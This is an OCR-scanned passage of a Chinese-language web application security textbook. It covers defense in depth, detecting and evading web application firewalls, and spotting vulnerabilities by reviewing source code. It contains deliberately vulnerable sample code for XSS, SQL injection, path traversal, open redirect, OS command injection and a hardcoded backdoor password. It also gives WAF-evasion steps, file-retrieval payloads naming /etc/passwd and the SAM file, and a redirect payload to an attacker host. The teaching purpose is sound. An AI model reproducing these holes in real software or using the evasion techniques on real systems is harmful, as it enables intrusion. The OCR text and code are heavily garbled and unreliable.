用 托管 代码 重新 编写 这 些 扩展 。 如 采 不 能 ， 则 应 确保 托管 代码 环境 先 执行 其 他 输入 确认 ， 
然后 再 将 输入 传递 给 这 些 功能 。 
口 可 以 对 需要 保留 的 许多 功能 与 资源 进行 重 命名 ， 以 防止 攻击 者 利用 它们 实施 另 一 层 隐 碍 。 
即使 技术 熟练 的 攻击 者 仍然 能 够 发 现 重 命名 后 的 名 称 ， 但 这 种 模糊 处 理 可 以 阻止 攻击 者 
新 手 与 目 动 化 蠕虫。 
口 在 整个 技术 栈 中 应 用 最 低 权 限 原 则 。 例如, 应 配置 Web 服 务 硕 进程 使 用 最 低 权限 的 操作 系 
统 账 户 。 还 可 以 在 UNIX 系 统 上 使 用 chroot 环 境 进一步 限制 任何 攻击 的 影响 范围 。 
4. 监控 新 的 漏洞 
应 指 小 一 名 组 织 职 员 人 负责 监控 Busgtraq 与 Full Disclosure 等 资源 ， 查 找 与 所 使 用 的 软件 中 新 发 
现 的 漏洞 有 关 的 公告 与 讨论 。 还 可 以 预订 各 种 私人 服务 , 由 他 们 提供 软件 中 已 经 发 现 但 尚未 公开 
披露 的 最 新 漏洞 通知 。 通 党 ， 如 果 了 解 与 某 个 漏洞 有 关 的 技术 细节 ， 就 可 以 在 供应 商 发 布 完整 的 
补丁 前 ， 有 效 地 修改 这 个 漏洞 。 
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5. 使 用 深层 防御 
应 该 始终 实施 几 层 保护 , 减轻 基础 架构 组 件 中 的 任何 安全 违反 造成 的 影响 。 可 以 采取 各 种 措 
施 ， 将 针对 Web 服 务 器 的 成 功 攻 击 的 影响 限制 在 局 部 范围 内 。 即 使 Web 服 务 需 被 完全 攻破 ， 这 些 
措施 也 让 用 户 有 足够 的 时 间 防 止 任何 严重 的 数据 泄露 。 
口 可 以 限制 Web 服 务 器 访问 其 他 自治 的 应 用 程序 组 件 。 例 如 , 应 只 允许 应 用 程序 使 用 的 数据 
库 账 户 INSERT 访 问 用 于 保存 审计 日 志 的 表 ; 这 意味 看 ， 即 使 攻击 者 攻破 Web 服 务 硕 ， 他 
也 无 法 删除 已 经 创建 的 任何 日 志 记 录 。 
口 可 以 对 进出 Web 服 务 需 的 流量 实施 严格 的 网 络 级 过 滤 。 
口 可 以 使 用 一 个 人 侵 检测 系统 确定 任何 表明 发 生 安 全 违反 的 反 篆 网络 活动 。 攻 破 Web 服 务 髓 
后 ， 许 多 攻击 者 会 立即 尝试 建立 反问 连接 ， 侵 和 人 因特网 ， 或 者 扫描 DMZ 网 络 中 的 其 他 主 
机 。 高 效 的 入 侵 检 测 系统 将 实时 通知 这 些 事件 ， 以 便 用 户 采 取 措 施 阻 止 攻击 。 


18.3 Web 应 用 程序 防火 墙 


许多 应 用 程序 都 受到 某 种 外 部 组 件 的 保护 ， 这 些 组 件 或 者 位 于 应 用 程序 所 在 的 同一 主机 上 ， 
或 者 位 于 基于 网 络 的 设备 上 ; 它们 要 人 么 执行 和 人 侵 防 御 (应 用 程序 防火 增 ), 要 么 执行 和 人 侵 检 测 (如 
传统 的 人 侵 检测 系统 )、 由 于 这 类 设备 用 于 确定 攻击 的 方法 基本 类 似 ， 因 此 ， 我 们 将 把 它们 当做 
同一 类 设备 看 得 。 虽然 许多 人 认为 安装 这 类 设备 总 比 什 么 都 不 做 要 强 , 但 是 ,许多 时 候 ， 它们 会 
造成 一 种 错误 的 安全 意识 ， 人 们 觉得 : 既然 实施 了 男 一 层 防御 ， 安 全 状况 将 会 日 动 改 善 。 虽然 此 
类 系统 并 不 会 降低 安全 防御 ,并 且 可 以 阻止 目标 明确 的 攻击 ( 如 因特网 蠕虫 ), 但 在 许多 情况 下 ， 
它 并 不 像 人 们 认为 的 那样 能 够 显著 改善 安全 状况 。 
值得 注意 的 是 ， 除 非 此 类 防御 设备 采用 大 量 定制 规则 ， 否 则 它们 并 不 能 防御 我 们 在 第 4~ 8 
草 中 讨论 的 任何 漏洞 ， 并 且 在 防范 业务 逻辑 中 的 洲 在 漏洞 〈 第 11 草 ) 方面 也 没有 任何 实际 用 途 。 
同时 ， 它 们 也 无 法 防范 某 些 特定 的 攻击 ， 如 基于 DOM 的 XSS (第 12 章 )。 至 于 其 他 漏洞 〈 利 用 这 
些 漏洞 的 攻击 会 表现 出 某 种 攻击 模式 )， 以 下 问题 通常 会 降低 Web 应 用 程序 防火 墙 的 用 人 处 。 
口 如 采 防 火 增 过 于 严格 地 如 循 HTTP 规 邦 ， 它 可 能 会 对 应 用 程序 服务 右 如 何人 处 理 请 求 做 出 假 
设 。 相 反 ， 网 络 层 防 御 中 的 防火 增 或 IDS 设 备 通 稍 并 不 了 解 某 些 HTTP 传 输 方 法 的 细节 。 
口 请 求 通过 防火 墙 后 ， 在 处 理 请 求 的 过 程 中 ， 应 用 程序 服务 絮 本 里 可 能 会 修改 用 户 输入 ， 
如 对 其 进行 解码 、 添 加 转 义 学 符 ， 或 过 滤 挥 特定 字符 串 。 前 儿 章 中 介绍 的 许多 攻击 步 又 
均 以 避 开 输入 确认 为 目标 ， 应 用 程序 层 防 火 墙 可 能 匈 于 受到 类 似 的 攻击 。 
口 许多 防火 场 和 IDS 和 警报 基于 特定 的 稼 见 攻击 有 效 载 傈 ， 而 不 是 基于 利用 漏洞 的 向 规 方法 。 
如 采 攻 击 者 能 够 检索 文件 系统 中 的 任意 文件 ， 针 对 /managerviewtempl?loc=/etc/passwd 的 
请 求 可 能 会 被 阻止 ， 但 针对 /managerviewtempl?loc=/varvlog/syslog 的 请 求 并 不 会 被 视 为 攻 
击 ， 即 使 其 内 容 可 能 对 攻击 者 更 加 有 用 。 
从 整体 看 ， 我 们 并 不 需要 区 分 全 局 输入 确认 过 滤 问 、 基 于 主机 的 代理 或 基于 网 络 的 Web 应 用 
程序 防火 场 。 以 下 步骤 适用 于 所 有 设备 。 
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渗透 测试 步 又 


可 以 使 用 以 下 步骤 推断 是 否 安 疙 了 Web 应 用 程序 防火 墙 。 








(1) 在 参数 值 中 使 用 明确 的 攻击 有 效 载 集 问 应 用 程序 ( 最 好 是 啊 应 中 包含 名 称 或 值 的 某 个 
应 用 程序 位 置 ) 提交 任意 参数 名 称 。 如 有 果 应 用 程序 阻止 该 攻击 ， 这 可 能 是 由 于 外 部 防御 机 制 
所 致 。 

(2) 如 有 末 可 以 提交 在 服务 硕 啊 应 中 返回 的 变量 ， 则 提供 一 系列 模糊 测试 字符 串 及 这 些 字 符 
串 的 编码 形式 可 以 确定 应 用 程序 的 用 户 输入 防御 行为 。 

(3) 对 应 用 程序 中 的 变量 实施 相同 的 攻击 来 确认 这 一 行为 。 

竺 尝试 避 开 Web 应 用 程序 防火 载 时 ， 可 以 提交 以 下 字符 串 。 

(1) 对 于 所 有 模糊 测试 字符 串 和 请 求 ， 使 用 标准 签名 数据 库 中 不 可 能 存在 的 良性 字符 串 作 
为 有 效 载 倍 。 根据 定义 ,我 们 不 可 能 提供 这 些 字 符 串 的 示例 。 但 是 ,在 进行 文件 检索 时 ， 应 避 
人 饭 将 /etc/passwd 或 /windows/system32/config/sam 作 为 有 效 载 何 。 此 外 ， 应 在 XSS 攻 击 中 人 避免 使 
用 <script>， 并 避免 将 alert () 或 xss 用 作 XSS 有 效 载 何 。 

(2) 如 果 特 定 请 求 被 阻止 , 可 以 尝试 在 其 他 位 置 或 上 下 文中 提交 相同 的 参数 。 例 如， 在 GET 
请 求 的 URL 中 、 在 PosT 请 求 主体 中 ， 以 及 在 PosT 请 求 的 URL 中 提交 相同 的 参数 。 

(3) 此 外 , 应 尝试 在 ASPNET 上 将 参数 作为 cookie 提 交 。 如 果 在 查询 字符 串 或 消息 主体 中 找 
不 到 参数 foo，API Request .Params ["foo"] 会 检索 名 为 foo 的 cookie 的 值 。 

(4) 回顾 第 4 章 中 介绍 的 引入 用 户 输入 的 所 有 其 他 方法 ， 选 择 其 中 任何 不 受 保护 的 方法 。 

(5) 确定 以 非 标 准 格 式 ( 如 序列 化 或 编码 ) 或 可 能 以 此 类 格式 提交 用 户 输 入 的 位 置 。 如 采 
找 不 到 此 类 位 置 ， 可 以 通过 串联 字符 串 和 /或 将 字符 串 分 布 到 多 个 参数 中 来 构建 攻击 字符 串 。 
(注意 ， 如 果 目 标 是 ASPNET， 可 以 使 用 HPP 通 过 同一 变量 的 各 种 变 体 来 串联 攻击 字符 串 。) 8 



































许多 部 闭 『 卫 Web 应 用 程序 防火 墙 或 IDS 的 组 织 并 没有 根据 本 市 介绍 的 方法 对 防御 设备 进行 有 
针对 性 的 测试 ， 因 此 ， 在 针对 此 类 设备 实施 攻击 时 ， 以 上 方法 通 汕 能够 雪 效 。 
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与 Web 应 用 程序 上 运行 的 其 他 组 件 一 样 ，Web 服 务 需 也 是 一 个 重要 的 受 攻击 面 ， 通 过 它 攻 击 
者 可 以 攻破 整个 应 用 程序 。Web 服 务 需 中 的 漏洞 可 使 攻击 者 访问 目录 列表 、 可 执行 页 面 的 源 代码 、 
敏感 配置 和 运行 时 间 数 据 ， 并 避 开 输入 过 滤 ， 直 接 威胁 应 用 程序 的 安全 。 

由 于 存在 大 量 各 种 各 样 的 Web 服 务 需 产品 与 版 本 ， 查 找 Web 服 务 需 漏洞 往往 需要 我 们 进行 一 
定 程度 的 探索 与 研究 。 但 是 , 使 用 自动 化 扫描 工具 可 以 迅速 高 效 地 确定 所 攻击 的 服务 器 的 配置 与 
软件 中 的 任何 已 知 漏洞 。 
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18.5 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec. net/wahh。 

(1) 在 什么 情 癌 下 Web 服 务 天 会 显示 目录 列表 ? 

(2) WebDAV 方 法 有 什么 作用 ?为 什么 说 它们 会 造成 危险 ? 

(3) 如 何 利 用 一 个 配置 成 Web 代 理 服务 咒 的 Web 服 务 需 ? 

(4) 何 为 Oracle PL/SQL 排 除 列表 ?如 何 避 开 这 个 列表 ? 

(5) 如 果 一 个 Web 服 务 器 允许 通过 HTTP 与 HTTPS 访 问 它 的 功能 ， 当 查询 漏洞 时 ， 使 用 其 中 一 
个 协议 与 使 用 男 一 个 协议 相 比 有 哪些 优点 ? 











但 找 产 代码 中 的 漏 油 








\ 人 一 今 为 止 ， 我 们 介绍 的 攻击 技巧 全 都 需要 与 一 个 正在 运行 的 应 用 程序 进行 交互 ; 而 且 ， 
从 很 大 程度 上 讲 , 这 些 攻击 主要 由 向 应 用 程序 提交 专门 设计 的 输入 和 监控 其 响应 这 两 
个 步 台 构成 。 本 音 将 分 析 一 种 截然 不 同 的 漏洞 查找 方法 : 通过 审查 应 用 程序 的 源 代码 来 查找 漏洞 
在 以 下 各 种 情况 下 ， 审 查 源 代码 有 助 于 渗透 测试 员 攻击 目标 Web 应 用 程序 。 
D 一些 应 用 程序 为 开源 应 用 程序 ， 或 者 使 用 开源 组 件 ， 允 许 从 相关 资料 库 中 下 载 它们 的 源 
代码 ， 并 从 中 寻找 漏洞 。 
如 果 在 提供 咨询 服务 时 执行 渗透 测试 ， 应 用 程序 所 有 者 可 能 会 允许 查看 应 用 程序 的 源 代 
码 ， 以 提高 审计 的 效率 。 
上 可 能 在 应 用 程序 中 发 现 允 许 下 载 其 源 代码 的 文件 泄露 漏洞 。 
口 大 多 数 应 用 程序 使 用 某 种 客户 端 代 码 ， 如 JavaScript; 不 需要 任何 权限 即 可 访问 它 。 
人 们 常常 认为 ， 如 果 想 要 进行 代码 审查 ,自身 必须 是 一 名 经 验 丰富 的 程序 员 ， 并 深入 了 解 纺 
写 代码 所 使 用 的 语言 。 然而, 事实 并 非 如 此 。 一 些 编程 经 验 有 限 的 人 也 能 够 阅读 并 理解 许多 高 级 
语言 ;同时 ， 在 Web 应 用 程序 常用 的 各 种 语言 中 ， 许 多 类 型 的 泼 洞 的 表现 形式 也 基本 相同 。 使 用 
某 种 常规 方法 就 可 以 完成 绝 大 多 数 的 代码 审查 , 而 且 还 可 通过 使 用 说 明 帮 助理 解 所 针对 的 语言 与 
环境 使 用 的 相关 语法 及 API。 本 章 将 介绍 渗透 测试 员 所 需要 的 核心 方法 ， 并 提供 可 能 遇 到 的 一 些 
语言 的 使 用 说 明 。 


19.1 代码 审查 方法 


代码 审查 的 方法 很 多 ,这 些 方法 有 助 于 提高 在 有 限 的 时 间 内 发 现 安全 狮 洞 的 效率 。 此 外 , 还 
可 以 将 代码 审查 与 其 他 测试 方法 结合 起 来 ， 充 分 利用 每 种 方法 的 优势 。 
19.1.1 “ 黑 盒 ”测试 与 “ 白 盒 ”测试 

前 面 各 章 描 述 的 攻击 方法 常 被 称 为 黑 盒 (black-box ) 测试 方法 ,因为 它 主要 从 外 部 攻击 应 用 
程序 ， 并 监控 其 输入 与 输出 ， 而 之 前 并 不 了 解 它 的 内 部 工作 机 制 。 相 反 ， 白 盒 《white-box ) 方法 
需要 分 析 应 用 程序 的 内 部 运作 ， 查 阅 所 有 设计 文档 、 源 代码 与 其 他 资料 。 

“日 鲍 ”代码 审查 可 非常 高 效 地 发 现 应 用 程序 中 存在 的 源 洞 。 在 审查 源 代码 的 过 程 中 , 我 们 常 













































































518 ”第 19 章 查找 源 代 码 中 的 漏洞 





种 可 以 迅速 确定 仅 使 用 “ 黑 盒 ”技巧 很 难 或 需要 很 长 时 间 才 能 发 现 的 漏洞 。 例 如 ， 通 过 阅读 代码 
可 迅速 确定 一 个 可 访问 任何 用 户 账户 的 后 门 密码 ,但 使 用 密码 猜测 攻击 儿 乎 不 可 能 发 现 这 个 密码 。 

然而 ， 代 码 审查 并 不 能 完全 蔡 代 “ 黑 盒 ”测试 。 当 然 ， 从 某 种 程度 上 讲 ， 应 用 程序 中 的 全 部 
漏洞 部 “存在 于 源 代 人 码 中 ”; 因此 ， 理 论 上 ， 通 过 代码 审查 可 以 确定 所 有 这 些 着 洞 。 但 是 ,使 用 
“ 黑 盒 ”方法 可 以 更 迅速 、 高 效 地 发 现 许 多 漏洞 。 举 例 来 说 ， 使 用 第 14 章 措 述 的 目 动 化 模糊 测试 
技巧 , 每 分 钟 可 以 同一 个 应 用 程序 发 送 数 百 个 测试 字符 串 , 它们 将 迅速 分 散 到 所 有 相关 代码 路 径 
中 ， 并 立即 返回 啊 应 。 为 外 ， 通 过问 每 个 字段 发 送 第 见 漏洞 的 触发 右 ， 第 党 可 以 在 几 分 钟 内 确 害 
大 量 通 过 代码 审查 逢 要 数 天 才能 发 现 的 汤 洞 。 而且, 许多 企业 级 应 用 程序 的 结构 极其 复杂 ， 对 用 
户 提交 的 输入 进行 多 层 处 理 。 同 时 , 应 用 程序 在 每 一 个 层面 实施 不 同 的 控制 与 检查 ,一段 源 代码 
中 的 明显 漏洞 可 能 会 被 其 他 地 方 的 代码 完全 消除 。 

大 多 数 情 况 下 ,，“ 黑 盒 ” 与 “日 盒 ” 技 巧 可 以 相互 补 序 ， 彼此 强化 。 通 第 ,通过 代码 审查 初 
步 查 明 一 个 着 洞 后 , 青 在 一 个 正在 运行 的 应 用 程序 中 对 其 进行 测试 , 是 确定 该 源 洞 是 否 真 实 存在 
的 最 简单 、 最 有 效 的 方法 。 相 反 ， 在 一 个 正在 运行 的 应 用 程序 中 确定 茶 种 反 笛 行为 后 ， 审 查 相关 
源 代码 往往 是 确定 其 根本 原因 的 最 佳 途 径 。 因 此 , 如 有 可 能 , 应 适当 结合 使 用 “ 黑 盒 ”与 “日 盒 ” 
的 技巧 ,并 根据 实时 测试 过 程 中 应 用 程序 的 反 篆 行为 、 源 代码 的 大 小 与 复杂 程度 ,调整 在 每 种 技 
巧 上 投入 的 时 间 与 精力 。 


19.1.2 ”代码 审查 方法 


任何 功能 比较 强大 的 应 用 程序 部 可 能 包含 成 二 上 万 行 源 代码 ， 许 多 情况 下 审查 代码 时 间 有 
限 ， 可 能 仅 有 几 天 时 间 。 因 此 ， 有 效 代码 审查 的 一 个 关键 目标 是 ， 在 有 限 的 时 间 与 精力 条 件 下 ， 
确定 尽 可 能 多 的 安全 汤 洞 。 为 了 实现 这 个 目标 , 我 们 有 必要 采用 一 种 结构 化 的 方法 , 使 用 各 种 技 
巧 确 你 迅速 确定 源 代 人 码 中 存在 的 “明显 独 洞 ”， 为 探查 更 微妙 、 更 难 发 现 的 漏洞 争取 更 多 时 间 。 

根据 我 们 的 经 验 ， 当 审查 Web 应 用 程序 源 代 码 时 ， 使 用 三 重 查找 方法 可 迅速 高 效 地 确定 其 中 
存在 的 漏洞 。 这 种 方法 由 以 下 3 个 步骤 组 成 。 

(1) 从 进入 点 开始 退 踪 用户 回 应 用 程序 提 区 的 数据 ， 审 查 人 负责 处 理 这 些 数 据 的 代码 。 

(2) 在 代码 中 搜索 表示 存在 稼 见 漏洞 的 签名 , 并 审查 这 些 签名 , 确定 茶 个 漏洞 是 人 否 确实 存在 。 

(3) 对 内 在 危险 的 代码 进行 逐 行 审查 ， 理 解 应 用 程序 的 逻辑 ， 并 确定 其 中 存在 的 所 有 问题 。 
需要 进行 仔细 审查 的 功能 组 件 包 括 : 应 用 程序 中 的 关键 安全 机 制 ( 验证、 会 话 管理 、 访 问 控制 与 任 
何 应 用 程序 范围 内 的 输入 确认 )、 外 部 组 件 接口 ,以 及 任何 使 用 本 地 代码 (通常 为 C/C++ ) 的 情况 。 

自 完 分 析 各 种 第 见 的 Web 应 用 程序 源 洞 在 源 代码 中 的 各 种 表现 形式 ,以 及 当 进 行 代码 审查 时 
如 何以 最 简单 的 方式 确定 这 些 表现 形式 。 这 将 有 助 于 在 代码 中 搜索 源 洞 签名 [第 (2) 步 | 和 仔细 审 
查 危 险 的 代码 [第 (3) 步 | 

然后 依次 分 析 一 些 最 流行 的 Web 开 发 语言 , 确定 应 用 程序 如 何 获 得 用 户 提 交 的 数据 ( 通过 请 
求 参 数 、cookie 等 )、 它 如 何 与 用 户 进 行 会话 交 互 、 每 种 语言 中 存在 潜在 危险 的 API 以 及 每 种 语言 
的 配置 与 环境 对 应 用 程序 安全 的 影响 。 这 将 有 助 于 我 们 从 进入 点 开始 追踪 用 户 回 应 用 程序 提交 
的 数据 | 第 (1) 步 上, 并 为 其 他 步 又 提供 每 种 语言 的 参考 。 最 后 介绍 一 些 进行 代码 审查 的 有 用 工具 。 
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注解 ” 当 进 行 代码 审查 时 ， 应 该 始终 记 住 ， 应 用 程序 可 能 扩展 了 类 库 与 接口 ， 对 标准 
API 调 用 执行 了 包装 器 ,并 对 安全 性 至 关 重要 的 任务 ( 如 保存 关于 每 个 会 话 的 信息 ) 采 


用 了 定制 机 制 。 在 进行 仔细 的 代码 审查 之 前 ， 必 须 了 解 这 些 定制 的 范围 ， 并 相应 调整 
审查 方法 。 





19.2 弟 见 漏洞 俭 


许多 类 型 的 Web 应 用 程序 漏洞 在 代码 中 都 有 相对 一 致 的 签名 ; 通常 ， 这 表示 通过 迅速 扫描 和 
搜索 代码 就 可 以 确定 一 个 应 用 程序 中 存在 的 大 部 分 漏洞 。 下 面 列 举 的 示例 出 现在 各 种 语言 中 , 但 
在 大 多 数 情况 下 ,签名 是 不 区 分 语言 的 。 最 重要 的 是 程序 员 采 用 的 编程 技巧 ， 而 不 是 实际 使 用 的 
API 和 语法 。 





























19.2.1 ” 跨 站 点 脚本 


在 非常 明显 的 XSS 汤 洞 中 ， 用 户 收 到 的 HTML 代 码 的 一 部 分 明显 是 由 用 户 可 控制 的 数据 构成 
的 。 在 下 面 的 代码 中 ，HREF 链 接 的 目标 即 由 从 请 求 查 询 了 字符 串 中 和 直接 提取 的 字符 串 构 成 : 

















String link = "<a href=" + HttpUtility.UrlDecode {Request .QueryString 
["refURL"]) + "&SiteID=" + SitelId + "&Path=" + HttpUtility.UrlEncode 
(Request.QueryString["Path"]) + "</a>"; 


objCell.InnerHtml = link; 

这 时 ,对 潜在 恶意 的 内 容 进 行 HTML 编 码 这 种 阻止 跨 站 点 脚本 的 常用 方法 ,并 不 适用 于 生成 
的 串联 字符 串 ， 因 为 它 已 经 包含 有 效 的 HTML 标 记 ; 任何 净化 数据 的 尝试 都 会 按 应 用 程序 指定 的 
方式 对 HTML 编 码 ， 从 而 中 断 应 用 程序 。 因 此 ， 这 个 示例 肯定 易于 受到 攻击 ， 除 非 在 其 他 地 方 实 
施 了 过 滤 ， 阻 止 了 在 查询 字符 串 中 包含 XSS 的 请 求 。 这 种 使 用 过 滤 来 阻止 XSS 攻 击 的 方法 往往 存 
在 缺陷 ， 如 果 采 用 ， 应 对 它 进 行 仔细 审查 ， 以 确定 解决 办 法 ( 请 参阅 第 12 章 了 解 相 关内 容 )。 

在 更 加 微妙 的 情况 下 , 用户 可 控制 的 数据 用 来 指定 随后 用 于 创建 发 送 给 用 户 响 应 的 一 个 变量 
值 。 在 下 面 的 示例 中 ， 类 成 员 变 量 m_pageTitle 被 设 定 为 从 请 求 查 询 字 符 串 中 提取 的 一 个 值 ， 
随后 将 用 于 创建 被 返回 的 HIML 页 面 的 <title> 元 素 : 


private void setPageTitle (HttpServietRegquest request) throws 









































ServietException 
1 
String requestType = request.getParameter ('type"}),; 


if ("3".eqguals (regquestType) && nulll-=regquest .getParameter ("title")’ 
m pageTitle = regquest .getParameter ("title"); 


else m pageTitle = "Online banking application’"; 
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当 遇 到 这 种 代码 时 ， 渗 透 测 试 员 应 该 仔细 审查 应 用 程序 对 m_pageTitle 变 量 的 处 理 过 
程 ， 以 及 它 是 如 何 被 合并 到 被 返回 的 页 面 中 的 ， 以 确定 数据 是 否 为 防止 XSS 攻 击 而 进行 了 适 
当 的 编码 。 

前 面 的 示例 明确 证 明代 码 审 查 在 查找 一 些 漏洞 时 的 重要 作用 。XSS 漏 洞 只 有 在 一 个 不 同 的 参 
数 (type ) 指定 一 个 特殊 的 值 (3 ) 时 才 会 触发 。 标 准 的 模糊 测试 与 对 相关 请 求 进行 漏洞 扫描 神 
无 法 发 现 这 种 漏洞 。 














19.2.2 SQL 注入 


如 末 各 种 便 编 码 的 字符 串 与 用 户 可 控制 的 数据 串联 成 一 个 SQL 查 何 , 然后 在 数据 库 内 执行 这 
个 查询 ,那么 最 可 能 出 现 SQL 注 入 漏洞 。 在 下 面 的 代码 中 ， 查询 由 直接 从 请 求 查询 字符 串 中 提取 
的 数据 构成 : 

StringBuilder SgqlQuery = newStringBuilder ("SELECT name, accno FROM 

TbhblCustomers WHERE " + SgqljWhere).: 














if (Reguest.QueryString["cCID"] != mulL] SS 
Request.QueryString["PageId"] == "2") 
| 





lOuery. Apend(” AND CustomerID 二 
SqlQuery.Append (Request.QuerySstring["cID"].ToString{()):; 
EL 

















在 源 代码 中 搜索 常用 于 从 用 户 提 交 的 输入 构建 查询 的 硬 编码 子 字 符 串 , 是 在 代码 中 迅速 确定 
这 种 明显 漏洞 的 简单 方法 。 这 些 子 字符 串通 第 由 SQL 代码 片断 组 成 ， 并 被 源 代 人 码 引 用 ; 因此 ， 寻 
找 由 引号 、SQL 关 键 字 和 空格 组 成 的 适当 模式 可 能 会 有 用 。 例 如 : 

“SELECT 

"INSERT 

"DELETE 

” AND 

” OR 

"WHERE 

" ORDER BY 


在 每 一 种 情况 中 ， 应 该 核实 将 这 些 字 符 串 与 用 户 可 控制 的 数据 串联 是 否 会 引入 SQL 注 入 源 
润 。 因为 SQL 关键 字 不 区 分 大 小 写 , 所 以 在 代码 中 搜索 这 些 关 键 子 时 也 应 不 区 分 大 小 写 。 请 注意 ， 
为 减少 错误 警报 ， 这 些 搜索 项 后 可 能 附加 了 空格 。 




















19.2.3 ”路 径 扬 历 


用 户 可 控制 的 输入 未 经 任何 输入 确认 , 或 者 核实 已 经 选择 一 个 适当 的 文件 , 就 被 传送 给 一 个 
文件 系统 API， 这 是 路 径 裔 历 漏洞 的 常见 签名 。 在 最 第 见 的 情况 下 ， 用 户 数 据 附 加 在 一 个 便 编 码 
或 系统 指定 的 目录 路 径 之 后 ,让 攻击 者 能 够 使 用 点 -点 - 斜 线 建 立 目 录 树 ,访问 其 他 目录 中 的 文件 。 
例如 : 
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public byte[] GetAttachment (HttpRequest Recuest ) 
{ 
FileStream fsAttachment = new FileSstream!(SpreadsheetPath + 
HttpUtility.UrlDecode (Regquest.QueryString["AttachName"]}, 
FileMode.Open, FileAccess.Read, FileShare.Read)}).; 








byte[] baAttachment = new bytelfsAttachment.Length]; 
fsAttachment.Read (FileContent, 0, 
Convert.ToInt32 (fsAttachment.Length, 
CultureInfo.CurrentCulture)): 


fsAttachment.Closel(}.: 
return bAttachment: 
} 


应 对 任何 允许 用 户 上 传 或 下 载 文件 的 应 用 程序 功能 进行 仔细 审查 , 了 解 它 是 如 何 根据 用 户 提 
交 的 数据 调用 文件 系统 API 的 , 并 确定 是 否 可 以 使 用 专门 设计 的 输入 访问 其 他 位 置 的 文件 。 通常， 
通过 在 代码 中 搜索 任何 与 文件 名 有 关 的 查询 字符 串 参 数 〈 在 本 例 中 为 AttachName )， 以 及 在 相 
天语 言 中 搜寻 所 有 文件 API 并 检查 提交 它们 的 参数 ,就 可 以 迅速 确定 相关 的 功能 。( 当 用 语言 中 的 
相关 API 列 表 见 后 文 。) 














19.2.4 任意 重 定 向 


通过 源 代 码 中 的 签名 稼 可 轻 多 确定 各 种 钓鱼 攻击 回 量 ， 如 任意 重 定向 。 在 下 面 这 个 示例 中 ， 
查询 字符 串 中 用 户 提交 的 数据 被 用 于 构建 一 个 URL， 用 户 即 被 重 定 癌 到 这 个 URL: 
private void handleCancel{) 


| 

















httpResponse.Redirect (HttpUtility.UrlDecode (Request .QueryStringl 
"refURL"]) + "&SiteCode=" + 
Reaquest.QueryString["SiteCode"] .ToString() + 
"RUSerIQ=" + Reguest.QueryString[l"UserId"] .ToString{()).;: 
} 


通 向 ， 检 查 客 户 端 代码 即 可 发 现任 意 重 定 同 漏洞 ; 当然 ,这 并 不 需要 了 解 应 用 程序 的 内 部 机 
制 。 在 下 面 的 示例 中 , 使 用 JavaScript 从 URL 查 询 字 符 串 中 提取 一 个 参数 , 并 最 终 重 定向 到 这 个 URL : 


url = document .URL:; 

















index = url.indexOof {'?redir="'); 
target = unescape (url.substring (index + 7, url.length)).; 
target = unescape (target); 


if {{index = target.indexOf ('//')) > 0) 1{ 
target = target.substring {index + 2, target.1length): 
index = target.indexOof ('/'):; 
target = target.substring(index, target. length); 

; 

target = unescape (target): 


Qocument.location = target; 
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可 见 , 这 段 脚本 的 作者 已 意识 到 , 该 脚本 可 能 会 成 为 指向 外 部 域 的 一 个 绝对 URL 的 重 定 向 攻 
击 的 日 标 。 该 脚本 检查 重 定 癌 URL 是 否 包含 一 个 双 和 斜 线 ( 像 http:// 中 一 样 )， 如 采 包 含 ， 就 省 略 第 
一 个 单 斜 线 ， 将 它 转换 成 一 个 相对 URL。 但 是， 当 它 最 后 一 次 调用 unescape () 也 数 时 ， 该 函数 
将 对 任何 URL 编 码 的 字符 进行 解码 。 确 认 后 再 执行 规范 化 常常 会 导致 漏洞 产生 ( 请 参阅 第 2 章 了 
解 相关 内 容 )。 在 这 个 示例 中 ， 攻 击 者 可 以 使 用 以 下 查询 字符 串 造 成 一 个 指 问 任 童 绝对 URL 的 重 
定 问 : 


?redir=http:%25252f%25252fwahh-attacker .com 


19.2.5 ”OS 命令 注入 


连接 到 外 部 系统 的 代码 中 常常 包含 指示 代码 注入 漏洞 的 签名 。 在 下 面 的 示例 中 ，message 
与 address 参 数 从 用 户 可 控制 的 表单 数据 中 提取 出 来 ， 然 后 直接 传送 给 UNIX system API: 
void send mail (const char *message, const char *addr) 
{ 
char sendMailCmd[4096]:; 


snprintf (sendMailCmd, 4096, "echo '%s' | sendmail %s", message, addr); 




















system!(sendMailCmd); 
return; 


} 


19.2.6 ”后门 密码 


除非 被 恶意 程序 员 有 意 隐 藏 ， 否 则 ， 当 审查 证 书 确认 逻辑 时 ,用 于 测试 或 管理 目的 的 后 门 密 
码 非常 容易 确定 。 例 如 ， 


Drivate Userprofile validateUser (String username, String password: 
{ 


UserPprofile up = getUserprofile (username); 











if (checkCredentials(up, password) || 
"oculiomnium" .equals (password)) 
return up; 


return null; 
} 
同样 ， 使 用 这 种 方法 还 可 以 轻易 确定 未 引用 的 也 数 与 隐藏 调试 参数 。 


19.2.7 ”本 地 代码 漏洞 

应 对 应 用 程序 使 用 的 任何 本 地 代码 进行 仔细 审查 , 确定 可 被 攻击 者 用 于 执行 任意 代码 的 种 见 
漏洞。 

1. 缓冲 区 浇 出 漏洞 

这 些 漏洞 常常 使 用 一 个 未 经 检查 的 API 实 现 对 缓冲 区 的 操控 。 这 些 API 数 量 众多 ， 包 括 
Strepy, StUICat, memcpy 与 sprintf 以 及 它们 的 wide-char 和 其 他 变 体 。 确定 代码 中 明显 的 组 
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冲 区 溢出 漏洞 的 一 种 简单 方法 是 ， 搜 索 所 有 这 些 API 的 用 法 ， 并 检 实 来 源 缓冲 区 是 否 可 由 用 户 控 
制 ， 以 及 代码 是 否 已 经 明确 确定 目标 缓冲 区 足够 大 ， 能 够 容纳 被 复制 到 它 里 面 的 数据 ( 因为 API 
不 会 这 样 做 )。 

我 们 可 以 轻易 确定 以 易 受 攻击 的 方式 调用 危险 API 的 做 法 。 在 下 面 的 示例 中 ， 用 户 可 控制 的 
字符 串 pszName 被 复制 到 一 个 固定 大 小 的 栈 缓冲 区 中 , 但 之 前 并 没有 检查 该 缓冲 区 是 否 足以 容纳 
这 些 字符 申 : 

BOOL CALLBACK CFiles: :EnumNameProc (LPTSTR PSszName 

{ 























char strFileName [MAX PATH]|: 


strcpy (strFrileName, pszName); 


} 

请 注意 ， 以 一 个 安全 的 API 蔡 代 未 经 检查 的 API， 这 种 方法 并 不 能 保证 缓冲 区 溢出 不 会 发 生 。 
有 时 ， 由 于 错误 或 误解 ， 一 个 经 过 检查 的 API 以 危险 的 方式 被 使 用 ， 以 前 面 漏 洞 的 “修复 代码 ” 
为 例 : 

